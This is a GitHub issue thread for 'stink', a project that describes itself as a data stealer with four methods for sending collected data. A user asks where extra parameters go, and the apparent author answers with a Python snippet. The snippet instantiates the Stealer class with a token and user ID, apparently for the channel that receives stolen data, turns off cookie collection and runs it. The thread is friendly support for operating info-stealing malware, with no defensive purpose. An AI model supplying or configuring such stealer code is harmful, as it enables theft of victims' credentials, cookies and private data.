FallenAstaroth / stink

🚀 Stealer on built-in libraries only, which doesn't create any temp files on data collecting, with 4 sending methods and lots of functionality.
Apache License 2.0
222 stars 56 forks source link

How to specify additional parameters? #35

Closed n4stl3 closed 1 year ago

n4stl3 commented 1 year ago

what is the name of file where are additional parameters?

FallenAstaroth commented 1 year ago

what is the name of file where are additional parameters?

Parameters are specified when creating an instance of the Stealer class.

Example with disabling cookies collecting:

from stink import Stealer

if __name__ == '__main__':
    Stealer(token="YOUR_TOKEN", user_id=YOUR_ID, cookies=False).run()

A list of all available parameters can be found here.

n4stl3 commented 1 year ago

thx bro you are really kind